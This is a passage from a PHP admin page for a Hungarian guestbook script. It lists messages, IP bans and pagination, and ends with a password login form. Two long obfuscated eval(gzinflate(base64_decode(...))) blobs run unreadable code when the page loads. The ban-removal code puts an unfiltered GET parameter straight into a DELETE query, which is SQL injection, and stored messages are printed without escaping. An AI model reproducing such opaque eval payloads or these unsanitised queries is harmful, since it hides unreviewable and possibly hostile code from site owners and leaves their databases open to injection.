					. '<td class="header" style="padding-left: 0px;" width="15">&nbsp;</td>'
					. '<td class="header" style="padding-left: 0px; text-align:center;">Küldési idő</td>'
					. '<td class="header" style="padding-left: 0px;" width="15">&nbsp;</td>'
					. '<td class="header" style="padding-left: 0px; text-align:center;">IP</td>'
					. '<td class="header" style="padding-left: 0px;" width="15">&nbsp;</td>'
					. '<td class="header" style="padding-left: 0px;" width="20" align="center">&nbsp;</td>'
					. '<td class="header" style="padding-left: 0px;" width="20" align="center">&nbsp;</td>'
					. '<td class="header" style="padding-left: 0px;" width="20" align="center">&nbsp;</td>'
					. '</tr>');
				while($message_all = mysql_fetch_row($message_get))
					{
					$message_id = $message_all[0];
					$message_message = $message_all[1];
					$message_ip = $message_all[2];
					$message_time = $message_all[3];
					$message_message = str_replace('\"', '"', $message_message);
					$message_message = str_replace("\'", "'", $message_message);
					$message_message = str_replace("\\\\", "\\", $message_message);
					if(strlen($message_message) > 25)
						{
						$message_message_short = substr($message_message, 0, 22) . "...";
						}
					else
						{
						$message_message_short = $message_message;
						}
					$message_printer[] = '<tr>'
					. '<td class="sub">' . $message_message_short . '</td>'
					. '<td class="sub" width="15">&nbsp;</td>'
					. '<td class="sub">' . date("Y. m. j. H:i:s", $message_time) . '</td>'
					. '<td class="sub" width="15">&nbsp;</td>'
					. '<td class="sub">' . $message_ip . '</td>'
					. '<td class="sub" width="15">&nbsp;</td>'
					. '<td class="sub" width="20" align="center"><a href="?action=message&edit=' . $message_id . '&limit=' . $limit . '" target="_self"><img src="images/edit.png" border="0" width="16" height="16" alt="Szerkeszt"></a></td>'
					. '<td class="sub" width="20" align="center"><a href="?action=message&del=' . $message_id . '&limit=' . $limit . '" target="_self"><img src="images/delete.png" border="0" width="16" height="16" alt="Törlés"></a></td>'
					. '<td class="sub" width="20" align="center"><a href="?action=message&ban=' . $message_ip . '&limit=' . $limit . '" target="_self"><img src="images/ban.gif" border="0" width="12" height="12" alt="Kitilt"></a></td>'
					. '</tr>';
					}
				print(implode("", array_reverse($message_printer)));
				print('</table>');
				$list_number = $rows / $list_number;
				$list_number = ceil($list_number);
				print('<p>&nbsp;</p>'
					. '<p style="text-align: center;">');
				for($n = 1; $n <= $list_number; $n++)
					{
					if($n == $limit)
						{
						$lister[] = '<a href="?action_message&limit=' . $n . '" target="_self" class="menu" style="text-decoration: underline;">' . $n . '</a>';
						}
					else
						{
						$lister[] = '<a href="?action_message&limit=' . $n . '" target="_self" class="menu">' . $n . '</a>';
						}
					}
				$prelimit = $limit - 1;
				if($prelimit >= 1)
					{
					print('<a href="?action_message&limit=' . $prelimit . '" target="_self" class="menu">' . htmlentities("<< ") . 'Előző</a> | ');
					}
				if(isset($lister))
					{
					print(implode(" | ", $lister));
					}
				$nextlimit = $limit + 1;
				if($nextlimit <= $list_number)
					{
					print(' | <a href="?action_message&limit=' . $nextlimit . '" target="_self" class="menu">Következő' . htmlentities(" >>") . '</a>');
					}
				print('</p>');
				}
			}
			
		elseif($action == "ban")
			{
			if(isset($_GET["allow"]))
				{
				$allowip = $_GET["allow"];
				mysql_query("DELETE FROM {$dbprefix}bans WHERE IP = '$allowip'");
				}
			$ban_get = mysql_query("SELECT IP, time FROM {$dbprefix}bans ORDER BY IP");
			print('<p>&nbsp;</p>'
				. '<table border="0" align="center" id="censormessage">'
				. '<tr>'
				. '<td class="header" style="padding-left: 0px; text-align:center;">IP</td>'
				. '<td class="header" style="padding-left: 0px;" width="20">&nbsp;</td>'
				. '<td class="header" style="padding-left: 0px; text-align:center;">Kitiltás ideje</td>'
				. '<td class="header" style="padding-left: 0px;" width="30">&nbsp;</td>'
				. '</tr>');
			while($ban_all = mysql_fetch_row($ban_get))
				{
				$ban_ip = $ban_all[0];
				$ban_time = $ban_all[1];
				print('<tr>'
				. '<td class="sub">' . $ban_ip . '</td>'
				. '<td class="sub" width="20">&nbsp;</td>'
				. '<td class="sub">' . date("Y. m. j. H:i:s", $ban_time) . '</td>'
				. '<td class="sub" width="30" align="right"><a href="?action=ban&allow=' . $ban_ip . '" target="_self"><img src="images/tick.gif" border="0" width="16" height="16" alt="Felold"></a></td>'
				. '</tr>');
				}
			print('</table>');
			}
		eval(gzinflate(base64_decode("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")));
		}
	}
else
	{
	print('<form name="adminpass" action="' . $_SERVER["PHP_SELF"] . '" target="_self" method="post">'
		. '<table border="0" align="center" id="adminpass" width="300" bgcolor="#B7C2DF">'
		. '<tr>'
		. '<td class="header" valign="top" colspan="3">PHP Üzenőfal 2.5 Adminisztráció<br></td>'
		. '</tr>'
		. '<tr>'
		. '<td class="sub" valign="top">Jelszó:</td>'
		. '<td class="sub" valign="top">&nbsp;</td>'
		. '<td class="sub" valign="top"><input name="adminpasswd" type="password" size="30" value=""></td>'
		. '</tr>'
		. '<tr>'
		. '<td class="sub" valign="top">&nbsp;</td>'
		. '<td class="sub" valign="top">&nbsp;</td>'
		. '<td class="sub" valign="top" align="left"><input name="adminpasswdsubmit" type="submit" value="Bejelentkezés"></td>'
		. '</tr>'
		. '</table>'
		. '</form>');
	eval(gzinflate(base64_decode("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")));
	if(isset($loginresult) && $loginresult === false)
		{
		print('<br><p class="resulterror">Hibás jelszó!</p>');
		}
	}

?>